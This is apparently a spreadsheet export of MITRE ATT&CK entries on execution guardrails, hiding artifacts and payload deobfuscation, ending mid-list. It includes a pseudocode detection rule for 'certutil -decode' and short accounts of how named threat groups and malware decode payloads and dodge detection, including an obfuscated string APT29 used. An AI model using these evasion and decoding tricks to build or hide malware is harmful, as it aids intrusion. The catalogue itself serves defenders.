Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection. Detecting the use of guardrails may be difficult depending on the implementation.
Do Not Mitigate
[Execution Guardrails](https://attack.mitre.org/techniques/T1480) likely should not be mitigated with preventative controls because it may protect unintended targets from being compromised. If targeted, efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior if compromised.
Anchor
[Anchor](https://attack.mitre.org/software/S0504) can terminate itself if specific execution flags are not present.(Citation: Cyberreason Anchor December 2019)
BitPaymer
[BitPaymer](https://attack.mitre.org/software/S0570) compares file names and paths to a list of excluded names and directory names during encryption.(Citation: Crowdstrike Indrik November 2018)
BoomBox
[BoomBox](https://attack.mitre.org/software/S0635) can check its current working directory and for the presence of a specific file and terminate if specific values are not found.(Citation: MSTIC Nobelium Toolset May 2021)
DEADEYE
[DEADEYE](https://attack.mitre.org/software/S1052) can ensure it executes only on intended systems by identifying the victim's volume serial number, hostname, and/or DNS domain.(Citation: Mandiant APT41)
EnvyScout
[EnvyScout](https://attack.mitre.org/software/S0634) can call &lt;code&gt;window.location.pathname&lt;/code&gt; to ensure that embedded files are being executed from the C: drive, and will terminate if they are not.(Citation: MSTIC Nobelium Toolset May 2021)
NativeZone
[NativeZone](https://attack.mitre.org/software/S0637) can check for the presence of KM.EkeyAlmaz1C.dll and will halt execution unless it is in the same directory as the rest of the malware's components.(Citation: MSTIC Nobelium Toolset May 2021)(Citation: SentinelOne NobleBaron June 2021)
SUNSPOT
[SUNSPOT](https://attack.mitre.org/software/S0562) only replaces SolarWinds Orion source code if the MD5 checksums of both the original source code file and backdoored replacement source code match hardcoded values.(Citation: CrowdStrike SUNSPOT Implant January 2021) 
Small Sieve
[Small Sieve](https://attack.mitre.org/software/S1035) can only execute correctly if the word `Platypus` is passed to it on the command line.(Citation: NCSC GCHQ Small Sieve Jan 2022)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) checks for specific operating systems on 32-bit machines, Registry keys, and dates for vulnerabilities, and will exit execution if the values are not met.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
Torisma
[Torisma](https://attack.mitre.org/software/S0678) is only delivered to a compromised host if the victim's IP address is on an allow-list.(Citation: McAfee Lazarus Nov 2020)
VaporRage
[VaporRage](https://attack.mitre.org/software/S0636) has the ability to check for the presence of a specific DLL and terminate if it is not found.(Citation: MSTIC Nobelium Toolset May 2021)
</t>
  </si>
  <si>
    <t>File Modification
Monitor for changes made to files for unexpected modifications that attempt to hide artifacts. On Windows, Event ID 4663 (Security Log - An attempt was made to access an object) can be used to alert on suspicious file accesses (e.g., attempting to write to a file which shouldn’t be further modified) that may coincide with attempts to hide artifacts. 
Process Creation
Monitor for newly executed processes that attempt to hide artifacts of an intrusion, such as common archive file applications and extensions (ex: Zip and RAR archive tools), and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.
CertUtil.exe may be used to encode and decode a file, including PE and script code. Encoding will convert a file to base64 with -----BEGIN CERTIFICATE----- and -----END CERTIFICATE----- tags. Malicious usage will include decoding an encoded file that was downloaded. Once decoded, it will be loaded by a parallel process. Note that there are two additional command switches that may be used - encodehex and decodehex. Similarly, the file will be encoded in HEX and later decoded for further execution. During triage, identify the source of the file being decoded. Review its contents or execution behavior for further analysis.
Analytic Event IDs are for Sysmon (Event ID 1 - process create) and Windows Security Log (Event ID 4688 - a new process has been created). The analytic is oriented around the creation of CertUtil.exe processes, which may be used to encode and decode files, including PE and script code. Malicious usage will include decoding a encoded file that was downloaded. Once decoded, it will be loaded by a parallel process.
&lt;h4&gt; Analytic 1 - CertUtil with Decode Argument &lt;/h4&gt;
&lt;code&gt; processes = filter processes where (
  (event_id == "1" OR event_id == "4688") AND
  exe =”C:\Windows\System32\certutil.exe” AND
  command_line = *decode* )&lt;/code&gt;
Script Execution
Monitor for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C0017
During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used the DUSTPAN loader to decrypt embedded payloads.(Citation: Mandiant APT41)
C0021
During [C0021](https://attack.mitre.org/campaigns/C0021), the threat actors deobfuscated encoded PowerShell commands including use of the specific string `'FromBase'+0x40+'String'`, in place of `FromBase64String` which is normally used to decode base64.(Citation: FireEye APT29 Nov 2018)(Citation: Microsoft Unidentified Dec 2018)
Frankenstein
During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors deobfuscated Base64-encoded commands following the execution of a malicious script, which revealed a small script designed to obtain an additional payload.(Citation: Talos Frankenstein June 2019)
Operation Dust Storm
During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), attackers used VBS code to decode payloads.(Citation: Cylance Dust Storm)
Operation Honeybee
During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), malicious files were decoded prior to execution.(Citation: McAfee Honeybee)
Operation Spalax
For [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors used a variety of packers and droppers to decrypt malicious payloads.(Citation: ESET Operation Spalax Jan 2021)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used 7-Zip to decode their [Raindrop](https://attack.mitre.org/software/S0565) malware.(Citation: Symantec RAINDROP January 2021)
APT19
An [APT19](https://attack.mitre.org/groups/G0073) HTTP malware variant decrypts strings using single-byte XOR keys.(Citation: Unit 42 C0d0so0 Jan 2016)
APT28
An [APT28](https://attack.mitre.org/groups/G0007) macro uses the command &lt;code&gt;certutil -decode&lt;/code&gt; to decode contents of a .txt file storing the base64 encoded payload.(Citation: Unit 42 Sofacy Feb 2018)(Citation: Palo Alto Sofacy 06-2018)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has used malware to decrypt encrypted CAB files.(Citation: FBI FLASH APT39 September 2020)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) downloads encoded payloads and decodes them on the victim.(Citation: Secureworks BRONZE BUTLER Oct 2017)
Darkhotel
[Darkhotel](https://attack.mitre.org/groups/G0012) has decrypted strings and imports using RC4 during execution.(Citation: Securelist Darkhotel Aug 2015)(Citation: Microsoft DUBNIUM July 2016)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) has used [certutil](https://attack.mitre.org/software/S0160) to decode a string into a cabinet file.(Citation: TrendMicro EarthLusca 2022)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has utilized `certutil` to decode base64 encoded versions of custom malware.(Citation: Mandiant FIN13 Aug 2022)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) tools decrypted additional payloads from the C2. [Gamaredon Group](https://attack.mitre.org/groups/G0047) has also decoded base64-encoded source code of a downloader.(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)
Gorgon Group
[Gorgon Group](https://attack.mitre.org/groups/G0078) malware can decode contents from a payload that was Base64 encoded and write the contents to a file.(Citation: Unit 42 Gorgon Group Aug 2018)
Higaisa
[Higaisa](https://attack.mitre.org/groups/G0126) used certutil to decode Base64 binaries at runtime and a 16-byte XOR key to decrypt data.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) has deobfuscated Base64-encoded shellcode strings prior to loading them.(Citation: Microsoft NICKEL December 2021)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has decoded malicious VBScripts using Base64.(Citation: Talos Kimsuky Nov 2021)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has used shellcode within macros to decrypt and manually map DLLs and shellcode into memory at runtime.(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has used a DLL known as SeDll to decrypt and execute other JavaScript backdoors.(Citation: Proofpoint Leviathan Oct 2017)
Molerats
[Molerats](https://attack.mitre.org/groups/G0021) decompresses ZIP files once on the victim machine.(Citation: Kaspersky MoleRATs April 2019)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) decoded base64-encoded PowerShell commands using a VBS file.(Citation: FireEye MuddyWater Mar 2018)(Citation: MuddyWater TrendMicro June 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: Talos MuddyWater Jan 2022)
OilRig
A [OilRig](https://attack.mitre.org/groups/G0049) macro has run a PowerShell command to decode file contents. [OilRig](https://attack.mitre.org/groups/G0049) has also used [certutil](https://attack.mitre.org/software/S0160) to decode base64-encoded files on victims.(Citation: FireEye APT34 Dec 2017)(Citation: OilRig New Delivery Oct 2017)(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Crowdstrike GTR2020 Mar 2020)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106) has extracted tar.gz files after downloading them from a C2 server.(Citation: Talos Rocke August 2018)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034)'s VBS backdoor can decode Base64-encoded data and save it to the %TEMP% folder. The group also decrypted received information using the Triple DES algorithm and decompresses it using GZip.(Citation: ESET Telebots Dec 2016)(Citation: ESET Telebots July 2017)
TA505
[TA505](https://attack.mitre.org/groups/G0092) has decrypted packed DLLs with an XOR key.(Citation: NCC Group TA505)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has used a script that decodes a Base64-encoded version of WeaveWorks Scope.(Citation: Cisco Talos Intelligence Group)
Threat Group-3390
During execution, [Threat Group-3390](https://attack.mitre.org/groups/G0027) malware deobfuscates and decompresses code that was encoded with Metasploit’s shikata_ga_nai encoder as well as compressed with LZNT1 compression.(Citation: Securelist LuckyMouse June 2018)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) used shellcode with an XOR algorithm to decrypt a payload. [Tropic Trooper](https://attack.mitre.org/groups/G0081) also decrypted image files which contained a payload.(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro Tropic Trooper May 2020)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has used a custom decryption routine, which pulls key and salt values from other artifacts such as a WMI filter or [PowerShell Profile](https://attack.mitre.org/techniques/T1546/013), to decode encrypted PowerShell payloads.(Citation: ESET Turla PowerShell May 2019)
WIRTE
[WIRTE](https://attack.mitre.org/groups/G0090) has used Base64 to decode malicious VBS script.(Citation: Lab52 WIRTE Apr 2019)
ZIRCONIUM
[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used the AES256 algorithm with a SHA1 derived key to decrypt exploit code.(Citation: Check Point APT31 February 2021)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has used [certutil](https://attack.mitre.org/software/S0160) in a macro to decode base64-encoded content contained in a dropper document attached to an email. The group has also used &lt;code&gt;certutil -decode&lt;/code&gt; to decode files on the victim’s machine when dropping [UPPERCUT](https://attack.mitre.org/software/S0275).(Citation: Accenture Hogfish April 2018)(Citation: FireEye APT10 Sept 2018)
ABK
[ABK](https://attack.mitre.org/software/S0469) has the ability to decrypt AES encrypted payloads.(Citation: Trend Micro Tick November 2019)
Action RAT
[Action RAT](https://attack.mitre.org/software/S1028) can use Base64 to decode actor-controlled C2 server communications.(Citation: MalwareBytes SideCopy Dec 2021)
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to decrypt strings encrypted with the Rijndael symmetric encryption algorithm.(Citation: Malwarebytes Agent Tesla April 2020)
Amadey
[Amadey](https://attack.mitre.org/software/S1025) has decoded antivirus name strings.(Citation: Korean FSI TA505 2020)
AppleJeus
[AppleJeus](https://attack.mitre.org/software/S0584) has decoded files received from a C2.(Citation: CISA AppleJeus Feb 2021)
AppleSeed
[AppleSeed](https://attack.mitre.org/software/S0622) can decode its payload prior to execution.(Citation: Malwarebytes Kimsuky June 2021)
Aria-body
[Aria-body](https://attack.mitre.org/software/S0456) has the ability to decrypt the loader configuration and payload DLL.(Citation: CheckPoint Naikon May 2020)
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) uses a fromCharCode() deobfuscation method to avoid explicitly writing execution commands and to hide its code. (Citation: Cybereason Astaroth Feb 2019)(Citation: Securelist Brazilian Banking Malware July 2020)
AuditCred
[AuditCred](https://attack.mitre.org/software/S0347) uses XOR and RC4 to perform decryption on the code functions.(Citation: TrendMicro Lazarus Nov 2018)
Avaddon
[Avaddon](https://attack.mitre.org/software/S0640) has decrypted encrypted strings.(Citation: Arxiv Avaddon Feb 2021)
Avenger
[Avenger](https://attack.mitre.org/software/S0473) has the ability to decrypt files downloaded from C2.(Citation: Trend Micro Tick November 2019)
AvosLocker
[AvosLocker](https://attack.mitre.org/software/S1053) has deobfuscated XOR-encoded strings.(Citation: Malwarebytes AvosLocker Jul 2021)
Azorult
[Azorult](https://attack.mitre.org/software/S0344) uses an XOR key to decrypt content and uses Base64 to decode the C2 address.(Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)
BADFLICK
[BADFLICK](https://attack.mitre.org/software/S0642) can decode shellcode using a custom rotating XOR cipher.(Citation: Accenture MUDCARP March 2019)
BBK
[BBK](https://attack.mitre.org/software/S0470) has the ability to decrypt AES encrypted payloads.(Citation: Trend Micro Tick November 2019)
BBSRAT
[BBSRAT](https://attack.mitre.org/software/S0127) uses [Expand](https://attack.mitre.org/software/S0361) to decompress a CAB file into executable content.(Citation: Palo Alto Networks BBSRAT)
BLINDINGCAN
[BLINDINGCAN](https://attack.mitre.org/software/S0520) has used AES and XOR to decrypt its DLLs.(Citation: US-CERT BLINDINGCAN Aug 2020)
BOOSTWRITE
[BOOSTWRITE](https://attack.mitre.org/software/S0415) has used a a 32-byte long multi-XOR key to decode data inside its payload.(Citation: FireEye FIN7 Oct 2019)	
Babuk
[Babuk](https://attack.mitre.org/software/S0638) has the ability to unpack itself into memory using XOR.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: Medium Babuk February 2021)
BabyShark
[BabyShark](https://attack.mitre.org/software/S0414) has the ability to decode downloaded files prior to execution.(Citation: CISA AA20-301A Kimsuky)
BackConfig
[BackConfig](https://attack.mitre.org/software/S0475) has used a custom routine to decrypt strings.(Citation: Unit 42 BackConfig May 2020)
Bandook
[Bandook](https://attack.mitre.org/software/S0234) has decoded its PowerShell script.(Citation: CheckPoint Bandook Nov 2020)
Bankshot
[Bankshot](https://attack.mitre.org/software/S0239) decodes embedded XOR strings.(Citation: US-CERT Bankshot Dec 2017)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can decrypt downloaded payloads. [Bazar](https://attack.mitre.org/software/S0534) also resolves strings and other artifacts at runtime.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)
BendyBear
[BendyBear](https://attack.mitre.org/software/S0574) has decrypted function blocks using a XOR key during runtime to evade detection.(Citation: Unit42 BendyBear Feb 2021)
Bisonal
[Bisonal](https://attack.mitre.org/software/S0268) has decoded strings in the malware using XOR and RC4.(Citation: Unit 42 Bisonal July 2018)(Citation: Talos Bisonal Mar 2020) 
BoomBox
[BoomBox](https://attack.mitre.org/software/S0635) can decrypt AES-encrypted files downloaded from C2.(Citation: MSTIC Nobelium Toolset May 2021)
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) has the ability to deobfuscate its payload prior to execution.(Citation: Palo Alto Brute Ratel July 2022)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) can deobfuscate C2 server responses and unpack its code on targeted hosts.(Citation: Proofpoint Bumblebee April 2022)(Citation: Medium Ali Salem Bumblebee April 2022)
Bundlore
[Bundlore](https://attack.mitre.org/software/S0482) has used &lt;code&gt;openssl&lt;/code&gt; to decrypt AES encrypted payload data. [Bundlore](https://attack.mitre.org/software/S0482) has also used base64 and RC4 with a hardcoded key to deobfuscate data.(Citation: MacKeeper Bundlore Apr 2019)
Carbon
[Carbon](https://attack.mitre.org/software/S0335) decrypts task and configuration files for execution.(Citation: ESET Carbon Mar 2017)(Citation: Accenture HyperStack October 2020)
Cardinal RAT
[Cardinal RAT](https://attack.mitre.org/software/S0348) decodes many of its artifacts and is decrypted (AES-128) after being downloaded.(Citation: PaloAlto CardinalRat Apr 2017)
Chaes
[Chaes](https://attack.mitre.org/software/S0631) has decrypted an AES encrypted binary file to trigger the download of other files.(Citation: Cybereason Chaes Nov 2020) 
CharmPower
[CharmPower](https://attack.mitre.org/software/S0674) can decrypt downloaded modules prior to execution.(Citation: Check Point APT35 CharmPower January 2022)
Chinoxy
The [Chinoxy](https://attack.mitre.org/software/S1041) dropping function can initiate decryption of its config file.(Citation: Bitdefender FunnyDream Campaign November 2020)
Chrommme
[Chrommme](https://attack.mitre.org/software/S0667) can decrypt its encrypted internal code.(Citation: ESET Gelsemium June 2021)
Clambling
[Clambling](https://attack.mitre.org/software/S0660) can deobfuscate its payload prior to execution.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)
Clop
[Clop](https://attack.mitre.org/software/S0611) has used a simple XOR operation to decrypt strings.(Citation: Mcafee Clop Aug 2019)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can deobfuscate shellcode using a rolling XOR and decrypt metadata from Beacon sessions.(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)
CoinTicker
[CoinTicker](https://attack.mitre.org/software/S0369) decodes the initially-downloaded hidden encoded file using OpenSSL.(Citation: CoinTicker 2019)
ComRAT
[ComRAT](https://attack.mitre.org/software/S0126) has used unique per machine passwords to decrypt the orchestrator payload and a hardcoded XOR key to decrypt its communications module. [ComRAT](https://attack.mitre.org/software/S0126) has also used a unique password to decrypt the file used for its hidden file system.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020)
Conti
[Conti](https://attack.mitre.org/software/S0575) has decrypted its payload using a hardcoded AES-256 key.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)
CookieMiner
[CookieMiner](https://attack.mitre.org/software/S0492) has used Google Chrome's decryption and extraction operations.(Citation: Unit42 CookieMiner Jan 2019)
CostaBricks
[CostaBricks](https://attack.mitre.org/software/S0614) has the ability to use bytecode to decrypt embedded payloads.(Citation: BlackBerry CostaRicto November 2020)
Crimson
[Crimson](https://attack.mitre.org/software/S0115) can decode its encoded PE file prior to execution.(Citation: Proofpoint Operation Transparent Tribe March 2016)
Cyclops Blink
[Cyclops Blink](https://attack.mitre.org/software/S0687) can decrypt and parse instructions sent from C2.(Citation: NCSC Cyclops Blink February 2022)
DDKONG
[DDKONG](https://attack.mitre.org/software/S0255) decodes an embedded configuration using XOR.(Citation: Rancor Unit42 June 2018)
DEADEYE
[DEADEYE](https://attack.mitre.org/software/S1052) has the ability to combine multiple sections of a binary which were broken up to evade detection into a single .dll prior to execution.(Citation: Mandiant APT41)
DanBot
[DanBot](https://attack.mitre.org/software/S1014) can use a VBA macro to decode its payload prior to installation and execution.(Citation: SecureWorks August 2019)
DarkTortilla
[DarkTortilla](https://attack.mitre.org/software/S1066) can decrypt its payload and associated configuration elements using the Rijndael cipher.(Citation: Secureworks DarkTortilla Aug 2022)
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) has the ability to self-extract as a RAR archive.(Citation: Prevailion DarkWatchman 2021)
Denis
[Denis](https://attack.mitre.org/software/S0354) will decrypt important strings used for C&amp;C communication.(Citation: Cybereason Cobalt Kitty 2017)
DropBook
[DropBook](https://attack.mitre.org/software/S0547) can unarchive data downloaded from the C2 to obtain the payload and persistence modules.(Citation: Cybereason Molerats Dec 2020) 
Drovorub
[Drovorub](https://attack.mitre.org/software/S0502) has de-obsfuscated XOR encrypted payloads in WebSocket messages.(Citation: NSA/FBI Drovorub August 2020)
Dtrack
[Dtrack](https://attack.mitre.org/software/S0567) has used a decryption routine that is part of an executable physical patch.(Citation: Securelist Dtrack)
Dyre
[Dyre](https://attack.mitre.org/software/S0024) decrypts resources needed for targeting the victim.(Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)
Ebury
[Ebury](https://attack.mitre.org/software/S0377) has verified C2 domain ownership by decrypting the TXT record using an embedded RSA public key.(Citation: ESET Ebury Oct 2017)
Ecipekac
[Ecipekac](https://attack.mitre.org/software/S0624) has the ability to decrypt fileless loader modules.(Citation: Securelist APT10 March 2021)
Egregor
[Egregor](https://attack.mitre.org/software/S0554) has been decrypted before execution.(Citation: NHS Digital Egregor Nov 2020)(Citation: Cybereason Egregor Nov 2020) 
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has used a self-extracting RAR file to deliver modules to victims. Emotet has also extracted embedded executables from files using hard-coded buffer offsets.(Citation: Binary Defense Emotes Wi-Fi Spreader)
EnvyScout
[EnvyScout](https://attack.mitre.org/software/S0634) can deobfuscate and write malicious ISO files to disk.(Citation: MSTIC Nobelium Toolset May 2021)
Exaramel for Linux
[Exaramel for Linux](https://attack.mitre.org/software/S0401) can decrypt its configuration file.(Citation: ANSSI Sandworm January 2021)
Expand
[Expand](https://attack.mitre.org/software/S0361) can be used to decompress a local or remote CAB file into an executable.(Citation: Microsoft Expand Utility)
FIVEHANDS
[FIVEHANDS](https://attack.mitre.org/software/S0618) has the ability to decrypt its payload prior to execution.(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)(Citation: NCC Group Fivehands June 2021)
FYAnti
[FYAnti](https://attack.mitre.org/software/S0628) has the ability to decrypt an embedded .NET module.(Citation: Securelist APT10 March 2021)
FatDuke
[FatDuke](https://attack.mitre.org/software/S0512) can decrypt AES encrypted C2 communications.(Citation: ESET Dukes October 2019)
FinFisher
[FinFisher](https://attack.mitre.org/software/S0182) extracts and decrypts stage 3 malware, which is stored in encrypted resources.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)
Final1stspy
[Final1stspy](https://attack.mitre.org/software/S0355) uses Python code to deobfuscate base64-encoded strings.(Citation: Unit 42 Nokki Oct 2018)
FoggyWeb
[FoggyWeb](https://attack.mitre.org/software/S0661) can be decrypted in memory using a Lightweight Encryption Algorithm (LEA)-128 key and decoded using a XOR key.(Citation: MSTIC FoggyWeb September 2021)
Gelsemium
[Gelsemium](https://attack.mitre.org/software/S0666) can decompress and decrypt DLLs and shellcode.(Citation: ESET Gelsemium June 2021)
GoldMax
[GoldMax](https://attack.mitre.org/software/S0588) has decoded and decrypted the configuration file when executed.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)
Goopy
[Goopy](https://attack.mitre.org/software/S0477) has used a polymorphic decryptor to decrypt itself at runtime.(Citation: Cybereason Cobalt Kitty 2017)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) can decrypt its encrypted internal strings.(Citation: ESET Grandoreiro April 2020)
Green Lambert
[Green Lambert](https://attack.mitre.org/software/S0690) can use multiple custom routines to decrypt strings prior to execution.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021)
GrimAgent
[GrimAgent](https://attack.mitre.org/software/S0632) can use a decryption algorithm for strings based on Rotate on Right (RoR) and Rotate on Left (RoL) functionality.(Citation: Group IB GrimAgent July 2021)
Hancitor
[Hancitor](https://attack.mitre.org/software/S0499) has decoded Base64 encoded URLs to insert a recipient’s name into the filename of the Word document. [Hancitor](https://attack.mitre.org/software/S0499) has also extracted executables from ZIP files.(Citation: Threatpost Hancitor)(Citation: FireEye Hancitor)
HermeticWiper
[HermeticWiper](https://attack.mitre.org/software/S0697) can decompress and copy driver files using `LZCopy`.(Citation: Crowdstrike DriveSlayer February 2022)
Heyoka Backdoor
[Heyoka Backdoor](https://attack.mitre.org/software/S1027) can decrypt its payload prior to execution.(Citation: SentinelOne Aoqin Dragon June 2022)
HiddenWasp
[HiddenWasp](https://attack.mitre.org/software/S0394) uses a cipher to implement a decoding function.(Citation: Intezer HiddenWasp Map 2019)
Hildegard
[Hildegard](https://attack.mitre.org/software/S0601) has decrypted ELF files with AES.(Citation: Unit 42 Hildegard Malware)
HyperBro
[HyperBro](https://attack.mitre.org/software/S0398) can unpack and decrypt its payload prior to execution.(Citation: Trend Micro DRBControl February 2020)(Citation: Trend Micro Iron Tiger April 2021)
ISMInjector
[ISMInjector](https://attack.mitre.org/software/S0189) uses the &lt;code&gt;certutil&lt;/code&gt; command to decode a payload file.(Citation: OilRig New Delivery Oct 2017)
IceApple
[IceApple](https://attack.mitre.org/software/S1022) can use a Base64-encoded AES key to decrypt tasking.(Citation: CrowdStrike IceApple May 2022)
Imminent Monitor
[Imminent Monitor](https://attack.mitre.org/software/S0434) has decoded malware components that are then dropped to the system.(Citation: QiAnXin APT-C-36 Feb2019)
Industroyer
[Industroyer](https://attack.mitre.org/software/S0604) decrypts code to connect to a remote C2 server.(Citation: ESET Industroyer)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can decrypt, unpack and load a DLL from its resources, or from blobs encrypted with Data Protection API, two-key triple DES, and variations of the XOR cipher.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)
IronNetInjector
[IronNetInjector](https://attack.mitre.org/software/S0581) has the ability to decrypt embedded .NET and PE payloads.(Citation: Unit 42 IronNetInjector February 2021 )
KEYPLUG
[KEYPLUG](https://attack.mitre.org/software/S1051) can decode its configuration file to determine C2 protocols.(Citation: Mandiant APT41)
KGH_SPY
[KGH_SPY](https://attack.mitre.org/software/S0526) can decrypt encrypted strings and write them to a newly created folder.(Citation: Cybereason Kimsuky November 2020)
KOCTOPUS
[KOCTOPUS](https://attack.mitre.org/software/S0669) has deobfuscated itself before executing its commands.(Citation: MalwareBytes LazyScripter Feb 2021)
KONNI
[KONNI](https://attack.mitre.org/software/S0356) has used certutil to download and decode base64 encoded strings and has also devoted a custom section to performing all the components of the deobfuscation process.(Citation: Medium KONNI Jan 2020)(Citation: Malwarebytes Konni Aug 2021)
Kerrdown
[Kerrdown](https://attack.mitre.org/software/S0585) can decode, decrypt, and decompress multiple layers of shellcode.(Citation: Unit 42 KerrDown February 2019)
Kessel
[Kessel](https://attack.mitre.org/software/S0487) has decrypted the binary's configuration once the &lt;code&gt;main&lt;/code&gt; function was launched.(Citation: ESET ForSSHe December 2018)
Kobalos
[Kobalos](https://attack.mitre.org/software/S0641) decrypts strings right after the initial communication, but before the authentication process.(Citation: ESET Kobalos Jan 2021) 
Kwampirs
[Kwampirs](https://attack.mitre.org/software/S0236) decrypts and extracts a copy of its main DLL payload when executing.(Citation: Symantec Orangeworm April 2018)
LightNeuron
[LightNeuron](https://attack.mitre.org/software/S0395) has used AES and XOR to decrypt configuration files and commands.(Citation: ESET LightNeuron May 2019)
LiteDuke
[LiteDuke](https://attack.mitre.org/software/S0513) has the ability to decrypt and decode multiple layers of obfuscation.(Citation: ESET Dukes October 2019)
Lizar
[Lizar](https://attack.mitre.org/software/S0681) can decrypt its configuration data.(Citation: BiZone Lizar May 2021)
Lokibot
[Lokibot](https://attack.mitre.org/software/S0447) has decoded and decrypted its stages multiple times using hard-coded keys to deliver the final payload, and has decoded its server response hex string using XOR.(Citation: Talos Lokibot Jan 2021)
LookBack
[LookBack](https://attack.mitre.org/software/S0582) has a function that decrypts malicious data.(Citation: Proofpoint LookBack Malware Aug 2019)
Lucifer
[Lucifer](https://attack.mitre.org/software/S0532) can decrypt its C2 address upon execution.(Citation: Unit 42 Lucifer June 2020)
MESSAGETAP
After checking for the existence of two files, keyword_parm.txt and parm.txt, [MESSAGETAP](https://attack.mitre.org/software/S0443) XOR decodes and read the contents of the files. (Citation: FireEye MESSAGETAP October 2019)
MacMa
[MacMa](https://attack.mitre.org/software/S1016) decrypts a downloaded file using AES-128-EBC with a custom delta.(Citation: ESET DazzleSpy Jan 2022)
Machete
[Machete](https://attack.mitre.org/software/S0409)’s downloaded data is decrypted using AES.(Citation: ESET Machete July 2019)
Mafalda
[Mafalda](https://attack.mitre.org/software/S1060) can decrypt files and data.(Citation: SentinelLabs Metador Sept 2022)
MegaCortex
[MegaCortex](https://attack.mitre.org/software/S0576) has used a Base64 key to decode its components.(Citation: IBM MegaCortex)
Metamorfo
Upon execution, [Metamorfo](https://attack.mitre.org/software/S0455) has unzipped itself after being downloaded to the system and has performed string decryption.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018)(Citation: ESET Casbaneiro Oct 2019) 
MirageFox
[MirageFox](https://attack.mitre.org/software/S0280) has a function for decrypting data containing C2 configuration information.(Citation: APT15 Intezer June 2018)
Mongall
[Mongall](https://attack.mitre.org/software/S1026) has the ability to decrypt its payload prior to execution.(Citation: SentinelOne Aoqin Dragon June 2022)
More_eggs
[More_eggs](https://attack.mitre.org/software/S0284) will decode malware components that are then dropped to the system.(Citation: Security Intelligence More Eggs Aug 2019)
Mori
[Mori](https://attack.mitre.org/software/S1047) can resolve networking APIs from strings that are ADD-encrypted.(Citation: DHS CISA AA22-055A MuddyWater February 2022)
NOKKI
[NOKKI](https://attack.mitre.org/software/S0353) uses a unique, custom de-obfuscation technique.(Citation: Unit 42 NOKKI Sept 2018)
NativeZone
[NativeZone](https://attack.mitre.org/software/S0637) can decrypt and decode embedded  [Cobalt Strike](https://attack.mitre.org/software/S0154) beacon stage shellcode.(Citation: MSTIC Nobelium Toolset May 2021)
Netwalker
[Netwalker](https://attack.mitre.org/software/S0457)'s PowerShell script can decode and decrypt multiple layers of obfuscation, leading to the [Netwalker](https://attack.mitre.org/software/S0457) DLL being loaded into memory.(Citation: Sophos Netwalker May 2020)
OSX/Shlayer
